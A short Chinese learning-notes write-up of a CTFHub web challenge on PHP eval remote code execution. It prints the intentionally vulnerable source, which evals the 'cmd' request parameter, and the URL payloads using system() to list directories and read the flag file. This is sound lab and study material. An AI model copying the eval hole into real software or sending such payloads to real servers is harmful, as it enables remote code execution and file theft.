CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
晓晓hh15 小时前
JavaSE学习——比较相关接口
学习
CC城子16 小时前
EtherCAT的igh学习与研究(二)
学习·ethercat
炽烈小老头16 小时前
【每天学习一点算法 2026/04/11】Pow(x, n)
学习·算法
旖-旎16 小时前
哈希表(存在重复元素)(3)
数据结构·c++·学习·算法·leetcode·散列表
weixin_5134499616 小时前
walk_these_ways项目学习记录第九篇(通过行为多样性 (MoB) 实现地形泛化)--学习算法
学习·算法·机器学习
chh56317 小时前
C++--内存管理
java·c语言·c++·windows·学习·面试
CNemon17 小时前
《怎样学习文言文》溯源
学习
wayz1117 小时前
21天机器学习核心算法学习计划(量化方向)
学习·算法·机器学习
Flandern111117 小时前
Go程序员学习AI大模型项目实战02:给 AI 装上“大脑”:从配置解包到流式生成的深度拆解
人工智能·后端·python·学习·golang
weixin_5134499618 小时前
walk_these_ways项目学习记录第十篇(通过行为多样性 (MoB) 实现地形泛化)--从仿真到部署
人工智能·学习·算法
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南04OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程05VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)06实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了07CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南08AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析09Oh My Codex 快速使用指南10开发者环境配置:用 Ollama 实现本地大模型部署(附下载慢的解决方案